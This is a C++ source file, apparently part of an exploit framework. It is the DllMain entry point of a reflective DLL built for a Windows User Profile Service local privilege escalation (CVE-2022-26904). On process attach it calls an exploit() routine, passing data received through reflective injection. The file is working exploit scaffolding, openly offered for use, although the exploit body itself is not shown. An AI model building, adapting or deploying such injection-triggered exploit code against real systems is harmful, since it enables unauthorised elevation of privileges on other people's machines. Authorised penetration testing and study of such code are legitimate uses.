external/source/exploits/CVE-2022-26904/SuperProfileDLL/dllmain.cpp
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <stdint.h>
#include <windows.h>
#include "ProfSvcLPE.h"
// Note we need to define this as an export. For the purpose of our code
// this can be a normal C++ export with standard name mangling
// but if we needed this to be C compatible
// we would just append "extern 'C'" to the front of this.
int main(char * incomingData) {
exploit(incomingData);
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
char* incomingData = (char*)lpReserved;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
main(incomingData); // Unfortunately for our purposes we can't call this function from DLLMain() otherwise we will hang.
//See https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain and https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-best-practices for more info
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}